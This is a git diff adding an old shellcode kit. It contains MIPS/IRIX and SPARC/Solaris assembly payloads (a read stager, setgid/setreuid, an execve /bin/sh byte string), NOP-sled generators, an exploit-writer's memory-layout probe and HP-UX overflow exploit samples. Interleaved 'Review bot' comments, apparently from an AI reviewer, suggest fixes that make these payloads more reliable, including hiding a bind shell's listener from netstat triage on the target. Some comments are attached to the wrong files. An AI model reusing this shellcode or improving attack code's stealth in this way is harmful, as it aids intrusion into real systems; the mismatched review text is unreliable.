/dev/null +++ b/other/shellkit/mips_irix/read.s 
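Review bot: After `accept` returns the client fd into s7, the listening socket (still in a0) is never closed, so it is inherited by `/bin/sh` as an extra descriptor: the port stays bound for the life of the shell, a second connection hangs in the backlog, and the open listener is exactly what a `netstat`/`fuser` triage on the target will point at. Saving it in a free callee register before accept (`andi s5, a0, 0xffff`) and issuing a close() of s5 after the dup loop removes the leak for four instructions. The `listen` call deliberately passes the stack pointer in a1 as the backlog; that is positive under a 32-bit user address space and the kernel clamps it, but the dependency should be stated as a requirement (`/* a1 = sp used as backlog; relies on sp < 0x80000000 */`) since it silently breaks under a 64-bit ABI. The bind address is all zeros (INADDR_ANY) and nothing authenticates the connecting peer, which is worth one sentence in the header comment for anyone deploying this on an engagement.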
@@ -0,0 +1,51 @@ +/* MIPS/IRIX PIC read/cacheflush code + * + * -sc. + * + * some note: + * since the data that is read in is treated in the data cache, you may + * experience a data/instruction cache incoherence, where the instruction + * cache still contains the old memory contents. to avoid this, send a lot + * of data, first the shellcode and then a huge bogus space of nops, which + * are to flush the data cache, later making the instruction cache populated + * with the real shellcode. or do it as we do it here, use a cacheflush + * syscall. this is only possible if this code is already in icache, so for + * the usual exploitation situation that does not help much. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + +foo: bltzal zero, foo + slti a0, zero, -1 + + addu ra, ra, (0x0101 + 48) + subu a1, ra, 0x0101 + + li a2, 0x1010 /* read 0x1010 bytes max */ + li v0, SYS_read + syscall + + subu a0, ra, 0x0101 /* data was read to here */ + li a1, 0x1010 /* should be cacheline aligned */ + li t2, -4 + not a2, t2 /* BCACHE = 0x03 */ + li v0, SYS_cachectl /* 0x047e */ + syscall + li t8, 0x7350 /* has to be a sane bds */ + + .end cbegin +cend: + diff --git a/other/shellkit/mips_irix/setgid.s b/other/shellkit/mips_irix/setgid.s new file mode 100644 index 0000000..3223892 --- /dev/null +++ b/other/shellkit/mips_irix/setgid.s @@ -0,0 +1,30 @@ +/* MIPS/IRIX PIC setgid chainable code + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + /* setgid (a0) */ + li a0, 0x4141 /* gid ^ 0x5555 */ + xor a0, a0, 0x5555 + li v0, SYS_setgid /* 0x0416 */ + syscall + li t8, 0x7350 + + .end cbegin +cend: + diff --git a/other/shellkit/mips_irix/setreuid.s b/other/shellkit/mips_irix/setreuid.s new file mode 100644 index 0000000..9578262 --- /dev/null 
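Review bot: The stager issues exactly one `read (0, ra+48, 0x1010)` and falls straight into the freshly read bytes, so any short read — routine on a TCP stream once the payload spans more than one segment — leaves a truncated second stage and execution runs off its end into whatever lies beyond. A loop that advances a1 by v0 and re-reads until the expected length arrives (or v0 <= 0) is the minimal fix; failing that, the single-read contract must be stated in the header, `/* XXX: one read() only: stage-2 must arrive in a single chunk of <= 0x1010 bytes */`, so the sender pads to match. The `cachectl` flush covers 0x1010 bytes from the buffer, matching the read, which only stays correct if both lengths are changed together.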
+++ b/other/shellkit/mips_irix/setreuid.s @@ -0,0 +1,32 @@ +/* MIPS/IRIX PIC setreuid chainable code + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + /* setreuid (a0, a1) */ + li a0, 0x4141 /* ruid ^ 0x5555 */ + li a1, 0x4242 /* euid ^ 0x5555 */ + xor a0, a0, 0x5555 + xor a1, a1, 0x5555 + li v0, SYS_setreuid /* 0x0464 */ + syscall + li t8, 0x7350 + + .end cbegin +cend: + diff --git a/other/shellkit/shellcode.c b/other/shellkit/shellcode.c new file mode 100644 index 0000000..330fe2e --- /dev/null +++ b/other/shellkit/shellcode.c @@ -0,0 +1,61 @@ + +/* TODO: better randomness + */ + +#include +#include +#include +#include +#include "shellcode.h" + + +unsigned long int +random_get (unsigned long int low, unsigned long int high) +{ + unsigned long int val; + + if (low > high) { + low ^= high; + high ^= low; + low ^= high; + } + + val = (unsigned long int) random (); + val %= (high - low); + val += low; + + return (val); +} + + +void +random_init (void) +{ + srandom (time (NULL)); +} + + +int +bad (unsigned char u) +{ + if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25') + return (1); + + return (0); +} + +int +badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len) +{ + int n; + + for (code_len -= 1 ; code_len >= 0 ; --code_len) { + for (n = 0 ; n < bad_len ; ++n) + if (code[code_len] == bad[n]) + return (1); + } + + return (0); +} + + diff --git a/other/shellkit/shellcode.h b/other/shellkit/shellcode.h new file mode 100644 index 0000000..02e090c --- /dev/null +++ b/other/shellkit/shellcode.h 
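Review bot: `random_get` computes `val %= (high - low)` after ordering the bounds, so `random_get (n, n)` divides by zero and `random_get (0, 1)` always returns 0 — the latter is exactly what `sparc_torf` in sparc.c calls, so the SPARC `v`/`r` bits are never randomised. Either make the interval closed (`val %= (high - low + 1);`, after re-checking how many `xferstr` entries mips.c indexes with `random_get (0, 17)`) or keep it half-open and say so in the header, `/* returns a value in [low, high); high must exceed low */`, with an early `if (high == low) return (low);` guard. The `TODO: better randomness` should also note that nothing here needs unpredictability — `srandom (time (NULL))` is adequate for shaping NOP sleds — so the TODO is not later "fixed" with a blocking entropy source.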
@@ -0,0 +1,62 @@ + +/* shellcode.h - shellcode structure and function definitions + * + * team teso + */ + +#ifndef SHELLCODE_H +#define SHELLCODE_H + + +/* (nop_gen) function type which will generate a nop space: + * parameters: unsigned char *dest, unsigned int dest_len + * + * will generate no more than dest_len bytes of nop space. the length + * is rounded down to a multiple of arch_codelen, so for risc archs be + * sure dest_len % arch_codelen is zero + * + * return the number of nop bytes generated (not the instruction count) + * + * XXX: name your functions _nop + */ +typedef unsigned int (* nop_gen)(unsigned char *, unsigned int, + unsigned char *, int); + +/* helper macro to set individual bits + */ +#define BSET(dest, len, val, bw) { \ + dest &= ~(((unsigned char) ~0) >> bw); /* clear lower bits */ \ + dest |= val << (8 - bw - len); /* set value bits */ \ + bw += len; \ +} + + +typedef struct { + char * code_string; /* description string of the code */ + unsigned int code_len; /* length of code in bytes */ + unsigned char * code; /* code byte array */ +} shellcode; + + +typedef struct { + char * arch_string; /* description string of this arch */ + unsigned int arch_codelen; /* minimum instruction length */ + nop_gen arch_nop; /* nop space generation function */ + shellcode ** arch_codes; /* shellcode array for this arch */ +} arch; + + +unsigned long int +random_get (unsigned long int low, unsigned long int high); + +void +random_init (void); + +int +bad (unsigned char u); + +int +badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len); + +#endif + diff --git a/other/shellkit/shellcode.o b/other/shellkit/shellcode.o new file mode 100644 index 0000000..189bd9e Binary files /dev/null and b/other/shellkit/shellcode.o differ diff --git a/other/shellkit/shellkit b/other/shellkit/shellkit new file mode 100644 index 0000000..1dab7f3 Binary files /dev/null and b/other/shellkit/shellkit differ 
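Review bot: The comment above the `nop_gen` typedef lists only `dest`/`dest_len`, but the typedef takes four parameters and both `mips_nop` and `sparc_nop` depend on the bad-byte list, so the contract should read `parameters: unsigned char *dest, unsigned int dest_len, unsigned char *bad, int bad_len`. `BSET` is a multi-statement macro in bare braces, so `if (c) BSET (...); else ...` fails to compile; wrap the body in `do { ... } while (0)`. Every `shellcode` initializer in the tree hand-counts `code_len` beside its byte string (64, 84, 172, ...), a value that will drift the first time a code is edited; a helper such as `#define SHELLCODE(name, bytes) { name, sizeof (bytes) - 1, bytes }` pins the length to the literal and removes that class of bug.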
diff --git a/other/shellkit/shellkit.c b/other/shellkit/shellkit.c new file mode 100644 index 0000000..79d830d --- /dev/null +++ b/other/shellkit/shellkit.c 
@@ -0,0 +1,123 @@ +/* shellkit.c - experimentation program for included shellcodes + * + * team teso + */ + +#include +#include +#include +#include "shellkit.h" + + +void usage (void); +void sc_list (void); + +int dump = 0; +int execute = 0; + + +void +usage (void) +{ + printf ("usage: shellkit [-hdlx] [-e env1 [-e env2] ...] [code-identifier1 [ci2 [...]]]\n\n"); + printf ("options:\n"); + printf ("\t-h\thelp, you're just viewing it\n" + "\t-d\tdump shellcode in hex\n" + "\t-l\tonly list available shellcodes\n" + "\t-x\texecute choosen shellcode\n" + "\t-e env\tbuild an environment for the shellcode, use -e list\n" + "\t\tto get a list\n\n"); + printf ("the shellkit utility will build a chained block of codes described by the\n" + "given code identifiers, copy it to a writeable place of memory and will\n" + "do anything necessary to execute this block of code on your architecture.\n" + "before executing the code the environments specified are installed.\n" + "you can - of course - only execute code for your architecture.\n\n"); + + exit (EXIT_FAILURE); +} + + +void +env_list (void) +{ + printf ("list of available environments:\n\n"); + + exit (EXIT_SUCCESS); +} + + +void +sc_list (void) +{ + int sc_walker; + int arch_walker; + arch * a; + + + for (arch_walker = 0 ; shellcodes[arch_walker] != NULL ; + ++arch_walker) + { + a = shellcodes[arch_walker]; + + printf ("%s:\n", a->arch_string); + for (sc_walker = 0 ; a->arch_codes[sc_walker] != NULL ; + ++sc_walker) + { + printf ("\t%-30s %3d\n", + a->arch_codes[sc_walker]->code_string, + a->arch_codes[sc_walker]->code_len); + } + printf ("\n"); + } + + exit (EXIT_SUCCESS); +} + + +int +main (int argc, char *argv[]) +{ + int c; + int xenvc = 0; + char * xenv[16]; + + + random_init (); + memset (xenv, '\x00', sizeof (xenv)); + + if (argc < 2) + sc_list (); + + while ((c = getopt (argc, argv, "hdlxe:")) != -1) { + switch (c) { + case 'h': + usage (); + break; + case 'd': + dump = 1; + break; + case 'l': + sc_list (); + 
break; + case 'x': + execute = 1; + break; + case 'e': + if (strcmp (optarg, "list") == 0) + env_list (); + if (xenvc >= 15) { + fprintf (stderr, "insane, huh? dont mess\n"); + exit (EXIT_FAILURE); + } + xenv[xenvc++] = optarg; + break; + default: + usage (); + break; + } + } + + exit (EXIT_SUCCESS); +} + + diff --git a/other/shellkit/shellkit.h b/other/shellkit/shellkit.h new file mode 100644 index 0000000..074fd65 --- /dev/null +++ b/other/shellkit/shellkit.h @@ -0,0 +1,31 @@ +/* shellkit.h - main shellcode kit definition file + * + * everything is merged here. + * + * team teso + */ + +#ifndef SHELLKIT_H +#define SHELLKIT_H + +#include "shellcode.h" + +/* individual architectures */ +#include "hppa_hpux.h" +#include "mips_irix.h" +#include "sparc_solaris.h" +#include "x86_bsd.h" +#include "x86_linux.h" + +arch * shellcodes[] = { + &hppa_hpux, + &mips_irix, + &sparc_solaris, + &x86_bsd, + &x86_linux, + NULL, +}; + + +#endif + diff --git a/other/shellkit/sparc.c b/other/shellkit/sparc.c new file mode 100644 index 0000000..45fe647 --- /dev/null +++ b/other/shellkit/sparc.c 
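Review bot: `main` parses `-d`, `-x` and `-e` into `dump`, `execute` and `xenv[]` and then returns EXIT_SUCCESS without reading any of them, so the chaining, dumping and execution promised by the usage text do not exist yet; either land them in this commit or make the unused paths fail loudly, e.g. `if (dump || execute) { fprintf (stderr, "not implemented\n"); exit (EXIT_FAILURE); }`, instead of silently succeeding. When `-x` is implemented, the "writeable place of memory" also has to be executable (`mmap` with `PROT_READ|PROT_WRITE|PROT_EXEC`, or `mprotect` after the copy) and, per the MIPS README in this commit, flushed with `cachectl` on that platform. `sc_list` prints `code_len`, an `unsigned int`, with `%3d`; use `%3u`.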
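Review bot: `arch * shellcodes[] = { ... }` is an object definition placed in a header, so a second translation unit including shellkit.h produces a duplicate-symbol link error that the `#ifndef SHELLKIT_H` guard cannot prevent across files; move the table into shellkit.c and leave `extern arch * shellcodes[];` here. The per-arch headers it pulls in declare their `arch` objects without `extern` as well (`arch mips_irix;`, `arch sparc_solaris;`), which only links thanks to common-symbol merging that recent gcc disables by default.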
@@ -0,0 +1,140 @@ +/* sparc.c - generic sparc functions + * + * by team teso + */ + +#include +#include +#include "shellcode.h" +#include "sparc.h" + + +static int sparc_torf (void); +static unsigned long int sparc_getinstr (unsigned char *pat, + unsigned char *bad, int bad_len); + + +static int +sparc_torf (void) +{ + return (random_get (0, 1)); +} + + +static unsigned long int +sparc_getinstr (unsigned char *pat, unsigned char *bad, int bad_len) +{ + int x; /* bitfield walker */ + unsigned char bc = 0; + unsigned long int i = 0; /* generated instruction */ + + + for (x = 31 ; x > 0 ; --x) { + + switch (pat[x]) { + case '.': + if (badstr (&bc, 1, bad, bad_len)) { + /*x -= 8;*/ + printf ("redo byte! #muh\n"); + } + bc = 0; + break; + + case '0': + break; + + case '1': + i |= (1 << x); + bc |= (1 << (x % 8)); + break; + + case 'v': + if (badstr (&bc, 1, bad, bad_len)) { + i |= (1 << x); + bc |= (1 << (x % 8)); + } else if (sparc_torf ()) { + i |= (1 << x); + bc |= (1 << (x % 8)); + } + break; + + case 'r': + case 'f': + case 's': + if (badstr (&bc, 1, bad, bad_len)) { + i |= (1 << x); + bc |= (1 << (x % 8)); + } else if (sparc_torf ()) { + i |= (1 << x); + bc |= (1 << (x % 8)); + } + break; + default: + fprintf (stderr, "sorry, can not generate nop's for " + "trinary sparcs ...\n"); + + exit (EXIT_FAILURE); + break; + } + } + + return (i); +} + + +/* XXX: DO NOT USE UNTESTED! */ +unsigned int +sparc_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len) +{ + unsigned long int * dest_p = NULL; + unsigned int count = 0; + + /* abstract representation of a sparc instruction. + * '1', '0': real bits of the instruction + * 'r', 'f', 's': destination, first and second source register + * 'v': either a 1 or 0 bit (any value) + * + * for details see "The SPARC Architecture Manual", chapter 5 + * ("Instructions") and appendix F + B. 
+ */ + unsigned char * pat = NULL; + unsigned char * instr_format[] = { + "10rrrrr0.00011fff.ff000000.000sssss", + "10rrrrr0.00011fff.ff1vvvvv.vvvvvvvv", /* xor */ + + "10rrrrr0.00111fff.ff000000.000sssss", + "10rrrrr0.00111fff.ff1vvvvv.vvvvvvvv", /* xnor */ + + "10rrrrr0.00100fff.ff000000.000sssss", + "10rrrrr0.00100fff.ff1vvvvv.vvvvvvvv", /* sub */ + + "10rrrrr0.00010fff.ff000000.000sssss", + "10rrrrr0.00010fff.ff1vvvvv.vvvvvvvv", /* or */ + + "10rrrrr0.00000fff.ff000000.000sssss", + "10rrrrr0.00000fff.ff1vvvvv.vvvvvvvv", /* add */ + + "10rrrrr0.00001fff.ff000000.000sssss", + "10rrrrr0.00001fff.ff1vvvvv.vvvvvvvv", /* and */ + + /* XXX/TODO: add more codes */ + + NULL, + }; + + + /* take care of instruction size + */ + dest_len = dest_len - (dest_len % 4); + dest_p = (unsigned long int *) dest; + + for ( ; count < dest_len ; count += 4) { + pat = instr_format[rand () % 12]; + *dest_p++ = sparc_getinstr (pat, bad, bad_len); + } + + return (count); +} + + diff --git a/other/shellkit/sparc.h b/other/shellkit/sparc.h new file mode 100644 index 0000000..bf5bd93 --- /dev/null +++ b/other/shellkit/sparc.h @@ -0,0 +1,10 @@ + +#ifndef SPARC_H +#define SPARC_H + +unsigned int +sparc_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len); + +#endif + diff --git a/other/shellkit/sparc.o b/other/shellkit/sparc.o new file mode 100644 index 0000000..22f52c8 Binary files /dev/null and b/other/shellkit/sparc.o differ diff --git a/other/shellkit/sparc_solaris.c b/other/shellkit/sparc_solaris.c new file mode 100644 index 0000000..ce44a1a --- /dev/null +++ b/other/shellkit/sparc_solaris.c 
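Review bot: `sparc_nop` stores each generated instruction through `unsigned long int *dest_p`, so on an LP64 host it writes 8 bytes per iteration while `count` advances 4 — overrunning `dest` by `dest_len` bytes — and on a little-endian host the bytes land reversed; `mips_nop` already packs big-endian bytes explicitly and this routine should do the same. `sparc_getinstr` also walks `pat[x]` for x = 31..1 against a 35-character pattern containing `.` separators, so pattern position and bit position never line up (`pat[0]`, the high opcode bit, is never read and `pat[8]` is a `.`), and `sparc_torf` relies on `random_get (0, 1)`, which with the half-open range in shellcode.c always returns 0, so the `v`/`r` bits are only ever set when a bad byte forces them. The `XXX: DO NOT USE UNTESTED!` marker is warranted; until the bit walker iterates the pattern left to right, skips `.` and shifts from bit 31 down, the storage rewrite below at least keeps the routine memory-safe, and `rand () % 12` becomes `random_get (0, 12)` for consistency with the rest of the kit.

```c
	/* … unchanged: instr_format table … */

	/* take care of instruction size
	 */
	dest_len = dest_len - (dest_len % 4);

	for ( ; count < dest_len ; count += 4) {
		unsigned long int insn;

		pat = instr_format[random_get (0, 12)];
		insn = sparc_getinstr (pat, bad, bad_len);

		/* SPARC is big-endian: emit exactly four bytes per instruction,
		 * independent of the host's word size and byte order
		 */
		dest[count + 0] = (insn >> 24) & 0xff;
		dest[count + 1] = (insn >> 16) & 0xff;
		dest[count + 2] = (insn >> 8) & 0xff;
		dest[count + 3] = insn & 0xff;
	}

	return (count);
```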
@@ -0,0 +1,58 @@ +#include +#include +#include +#include "shellcode.h" +#include "sparc.h" + + +shellcode sparc_solaris_execvesh = { + "sparc-solaris-execve", + 48, + "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda" + "\x90\x03\xa0\x08\x92\x13\x80\x0e\x9c\x03\xa0\x10" + "\x94\x1b\x80\x0e\xec\x3b\xbf\xf8\xd0\x23\xbf\xf0" + "\xd4\x23\xbf\xf4\x82\x10\x20\x3b\x91\xd0\x20\x08", +}; + + +shellcode sparc_solaris_exit = { + "sparc-solaris-exit", + 8, + "\x82\x10\x20\x01\x91\xd0\x20\x08", +}; + + +shellcode sparc_solaris_setgid = { + "sparc-solaris-setgid", + 16, + "\x90\x10\x21\x42\x90\x1a\x21\x44\x82\x10\x20\x2e" + "\x91\xd0\x20\x08", +}; + + +shellcode sparc_solaris_setreuid = { + "sparc-solaris-setreuid", + 24, + "\x90\x10\x21\x42\x90\x1a\x21\x44\x92\x10\x21\x46" + "\x92\x1a\x61\x48\x82\x10\x20\x2e\x91\xd0\x20\x08", +}; + + +shellcode * sparc_solaris_shellcodes[] = { + &sparc_solaris_execvesh, + &sparc_solaris_exit, + &sparc_solaris_setgid, + &sparc_solaris_setreuid, + NULL, +}; + + +arch sparc_solaris = { + "sparc-solaris", + 4, + sparc_nop, + sparc_solaris_shellcodes +}; + + + diff --git a/other/shellkit/sparc_solaris.h b/other/shellkit/sparc_solaris.h new file mode 100644 index 0000000..24419e3 --- /dev/null +++ b/other/shellkit/sparc_solaris.h @@ -0,0 +1,6 @@ +#ifndef SPARC_SOLARIS_H +#define SPARC_SOLARIS_H + +arch sparc_solaris; + +#endif diff --git a/other/shellkit/sparc_solaris.o b/other/shellkit/sparc_solaris.o new file mode 100644 index 0000000..0b98d72 Binary files /dev/null and b/other/shellkit/sparc_solaris.o differ diff --git a/other/shellkit/sparc_solaris/AUTHORS b/other/shellkit/sparc_solaris/AUTHORS new file mode 100644 index 0000000..01bb209 --- /dev/null +++ b/other/shellkit/sparc_solaris/AUTHORS @@ -0,0 +1,2 @@ +palmers / teso +smiler / teso diff --git a/other/shellkit/sparc_solaris/NOTES b/other/shellkit/sparc_solaris/NOTES new file mode 100644 index 0000000..166eccc --- /dev/null +++ b/other/shellkit/sparc_solaris/NOTES 
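Review bot: The uid/gid placeholders in `sparc_solaris_setgid` and `sparc_solaris_setreuid` sit in 13-bit `simm13` fields — the committed bytes decode to `mov 0x142, %o0 ; xor %o0, 0x144, %o0` (gid 6), not the `0x4142`/`0x4344` written in setgid.s — so unlike the MIPS entries there is no byte pair that can take an arbitrary 16-bit id and no `*_setup` helper is provided. Either build the id with `sethi`/`or` so a full-width field exists and add `sparc_solaris_setgid_setup`/`sparc_solaris_setreuid_setup`, or document on each entry that it hard-codes a single id. The execve entry is named `"sparc-solaris-execve"` while the MIPS entry and the hppa source use the `execvesh` suffix; since these strings are the identifiers users pass on the shellkit command line, rename it `"sparc-solaris-execvesh"`.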
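Review bot: `arch sparc_solaris;` is a tentative definition in a header, so every file that includes sparc_solaris.h emits its own object and the link depends on common-symbol merging that recent gcc disables by default; declare it as `extern arch sparc_solaris;` and leave the definition in sparc_solaris.c.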
@@ -0,0 +1,11 @@ +would this shellcodes work in sparc NetBSD or SunOS? +would require "ta 0" instead of "ta8"? + + +todo: +connect +bind +chmod +read +spset + diff --git a/other/shellkit/sparc_solaris/execve.s b/other/shellkit/sparc_solaris/execve.s new file mode 100644 index 0000000..0a0c11b --- /dev/null +++ b/other/shellkit/sparc_solaris/execve.s @@ -0,0 +1,20 @@ + .globl cbegin + .globl cend + +cbegin: + + sethi 0xbd89a, %l6 + or %l6, 0x16e, %l6 + sethi 0xbdcda, %l7 + add %sp, 8, %o0 + or %sp, %sp, %o1 + add %sp, 16, %sp + xor %o6, %o6, %o2 + std %l6, [%sp - 8] + st %o0, [%sp - 16] + st %o2, [%sp - 12] + mov 0x3b, %g1 + ta 8 + +cend: + diff --git a/other/shellkit/sparc_solaris/exit.s b/other/shellkit/sparc_solaris/exit.s new file mode 100644 index 0000000..3019a42 --- /dev/null +++ b/other/shellkit/sparc_solaris/exit.s @@ -0,0 +1,10 @@ + .globl cbegin + .globl cend + +cbegin: + + mov 0x1, %g1 + ta 0x8 + +cend: + diff --git a/other/shellkit/sparc_solaris/setgid.s b/other/shellkit/sparc_solaris/setgid.s new file mode 100644 index 0000000..c307065 --- /dev/null +++ b/other/shellkit/sparc_solaris/setgid.s @@ -0,0 +1,12 @@ + .globl cbegin + .globl cend + +cbegin: + + mov 0x4142, %o0 + xor 0x4344, %o0, %o0 + mov 0x2e, %g1 + ta 0x8 + +cend: + diff --git a/other/shellkit/sparc_solaris/setreuid.s b/other/shellkit/sparc_solaris/setreuid.s new file mode 100644 index 0000000..e17c375 --- /dev/null +++ b/other/shellkit/sparc_solaris/setreuid.s @@ -0,0 +1,14 @@ + .globl cbegin + .globl cend + +cbegin: + + mov 0x4142, %o0 + xor 0x4344, %o0, %o0 + mov 0x4546, %o1 + xor 0x4748, %o1, %o1 + mov 0xca, %g1 + ta 0x8 + +cend: + diff --git a/other/shellkit/splocoder b/other/shellkit/splocoder new file mode 100644 index 0000000..6828783 Binary files /dev/null and b/other/shellkit/splocoder differ diff --git a/other/shellkit/splocoder.c b/other/shellkit/splocoder.c new file mode 100644 index 0000000..96e36f8 --- /dev/null +++ b/other/shellkit/splocoder.c 
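Review bot: `mov 0x4142, %o0` and `xor 0x4344, %o0, %o0` in setgid.s should not assemble as written: SPARC `or`/`xor` immediates are 13-bit signed (-4096..4095), and the xor also places the immediate in the rs1 slot where the operand order is `xor %o0, 0x4344, %o0`. The bytes shipped in sparc_solaris.c decode to `mov 0x142, %o0 ; xor %o0, 0x144, %o0`, so this source is not what produced them; regenerate one from the other, and if 16-bit ids are required switch to `sethi %hi(val), %o0 ; or %o0, %lo(val), %o0` so a setup routine has a full-width field to patch. The same applies to setreuid.s in this hunk group.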
@@ -0,0 +1,184 @@ +/* + + A tool for the young exploit coder, Copyright (c) acpizer, 2001. + +*/ + +#include +#include +#include + + +char small_global[] = "acpizer"; + +int uninitialized_global; + + +int endianess() { + union { + long l; + char c[sizeof (long)]; + } u; + + u.l = 1; + + return (u.c[sizeof (long) - 1] == 1); +} + + +static int iterate = 10; + +int stack_growsdown(int *x) { + auto int y; + + + y = (x > &y); + + if (--iterate > 0) + y = stack_growsdown(&y); + + if (y != (x > &y)) + exit(1); + + return y; +} + +typedef struct { + char * sys_name; + char * sys_release; + char * sys_version; + char * sys_machine; + + unsigned long int malloc_zero; + unsigned long int malloc_neg; + unsigned long int malloc_big; + + unsigned long int malloc_small; + unsigned long int malloc_tiny; + + unsigned long int bss; + unsigned long int data; + + int sizeof_int; + int sizeof_voidptr; + + unsigned long int env_start; + + unsigned long int frame_addr; + + int stack_down; + int endian_big; +} sys_def; + +sys_def this; + + +int +main (int argc, char *argv[], char *env[]) +{ + struct utsname uts; + + char localstack[5]; + auto int x; + + + printf("splocoder, v1.0 by acpizer & sc -- team teso.\n\n"); + + uname (&uts); + + this.sys_name = uts.sysname; + this.sys_release = uts.release; + this.sys_version = uts.version; + this.sys_machine = uts.machine; + +#ifdef VERBOSE + printf("System: %s %s %s %s\n\n", uts.sysname, uts.release, uts.version, + uts.machine); +#endif + + this.malloc_zero = (unsigned long int) malloc (0); + this.malloc_neg = (unsigned long int) malloc (-4); + this.malloc_big = (unsigned long int) malloc (1024 * 1024); + +#ifdef VERBOSE + printf("malloc(0) returns: 0x%08lx\n", this.malloc_zero); + printf("malloc(-4) returns: 0x%08lx\n", this.malloc_neg); + printf("Big heap: 0x%08lx\n", this.malloc_big); +#endif + + /* There might be a differece, depending on malloc implementation. 
*/ + this.malloc_small = (unsigned long int) malloc (100); + this.malloc_tiny = (unsigned long int) malloc (5); + +#ifdef VERBOSE + printf("Small heap: 0x%08lx\n", this.malloc_small); + printf("Tiny heap: 0x%08lx\n\n", this.malloc_tiny); +#endif + + + this.bss = (unsigned long int) &uninitialized_global; + this.data = (unsigned long int) &small_global; + +#ifdef VERBOSE + printf("bss is at: 0x%08lx\n", this.bss); + printf("Initialized global data is at: 0x%08lx\n\n", this.data); +#endif + + + this.sizeof_int = sizeof (int); + this.sizeof_voidptr = sizeof (void *); + +#ifdef VERBOSE + printf("sizeof(int): %d\n", this.sizeof_int); + printf("sizeof(void *): %d\n\n", this.sizeof_voidptr); +#endif + + + this.env_start = (unsigned long int) &env[0]; +#ifdef VERBOSE + printf("environ[0]: 0x%08lx\n\n", this.env_start); +#endif + + this.frame_addr = (unsigned long int) &localstack; +#ifdef VERBOSE + printf("Local stack variable is at 0x%08lx\n", this.frame_addr); +#endif + + this.stack_down = stack_growsdown (&x) ? 1 : 0; +#ifdef VERBOSE + printf("Stack growth direction: %s\n", this.stack_down ? "down" : "up"); +#endif + + this.endian_big = endianess () ? 1 : 0; +#ifdef VERBOSE + printf("Endianess: %s\n\n", this.endian_big ? "big" : "little"); +#endif + + + { + char sys[30]; + + snprintf (sys, sizeof (sys), "%s-%s-%s", this.sys_name, + this.sys_release, this.sys_machine); + fprintf (stderr, "%-32s ", sys); + } + fprintf (stderr, "%s %-10s ", this.endian_big ? "be" : "le", + this.stack_down ? 
"stackdown" : "stackup"); + fprintf (stderr, "%3d %3d\n", + this.sizeof_int, this.sizeof_voidptr); + + fprintf (stderr, "%-33s%08lx %08lx %08lx %08lx", + " data bss stack env", + this.data, this.bss, + this.frame_addr, this.env_start); + fprintf (stderr, "\n"); + + fprintf (stderr, "%-33s%08lx %08lx %08lx %08lx %08lx ", + " M: zero neg big small tiny", + this.malloc_zero, this.malloc_neg, this.malloc_big, + this.malloc_small, this.malloc_tiny); + fprintf (stderr, "\n"); + + exit (EXIT_SUCCESS); +} + diff --git a/other/shellkit/tmp/hpux-tools.tar.gz b/other/shellkit/tmp/hpux-tools.tar.gz new file mode 100644 index 0000000..6fa3a5e Binary files /dev/null and b/other/shellkit/tmp/hpux-tools.tar.gz differ diff --git a/other/shellkit/tmp/hpux-tools/Makefile b/other/shellkit/tmp/hpux-tools/Makefile new file mode 100644 index 0000000..19e8fd4 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/Makefile @@ -0,0 +1,5 @@ +all: sample-one shell-one shell-two shell-tree + + +sample-one: + @cd sample-one && make diff --git a/other/shellkit/tmp/hpux-tools/README b/other/shellkit/tmp/hpux-tools/README new file mode 100644 index 0000000..b6ee0df --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/README @@ -0,0 +1,10 @@ +This archive contains following files: +Makefile - make file to build the stuff +sample-one - example of exploit and vulnerable program +shell-one.s - shellcode (v1) +shell-tree.s - shellcode (v2) +shell-two.s - shellcode (v3) + + +-- +fygrave@tigerteam.net diff --git a/other/shellkit/tmp/hpux-tools/sample-one/Makefile b/other/shellkit/tmp/hpux-tools/sample-one/Makefile new file mode 100644 index 0000000..aea8390 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/Makefile @@ -0,0 +1,10 @@ +all: exploit vuln + +exploit: exploit.c + gcc exploit.c -o exploit +vuln: vuln.c + gcc vuln.c -o vuln + + +clean: + @rm -f core *.core *.o vuln exploit a.out 
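Review bot: The return value of `uname (&uts)` in `main` is never checked, so on failure `this.sys_name` and the other three pointers refer into an uninitialised struct and are later passed to `%s`. A guard in the style the file already uses at its end, `if (uname (&uts) != 0) { perror ("uname"); exit (EXIT_FAILURE); }`, closes that. `stack_growsdown` likewise calls `exit (1)` without any message when its self-check fails, leaving only a silent non-zero status; a one-line `fprintf (stderr, "stack direction check failed\n");` before the exit would make the failure diagnosable.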
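Review bot: `all: sample-one shell-one shell-two shell-tree` names three targets that have no rule anywhere in this Makefile, so `make` stops with "No rule to make target" before the assembler sources are built; either add rules for the three `.s` files or reduce the line to `all: sample-one`. The `sample-one:` target also has the same name as the directory the commit creates, so with no prerequisites make treats it as up to date and never runs `@cd sample-one && make`; declaring `.PHONY: all sample-one` fixes that.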
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/README b/other/shellkit/tmp/hpux-tools/sample-one/README new file mode 100644 index 0000000..66be971 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/README @@ -0,0 +1,5 @@ +These are examples for HP-UX buffer overflow case study. For more information +please see http://www.notlsd.net/bof/ + +-- +fygrave@tigerteam.net Tue Mar 20 15:41:48 ICT 2001 diff --git a/other/shellkit/tmp/hpux-tools/sample-one/exploit.c b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c new file mode 100644 index 0000000..11dc23c --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c 
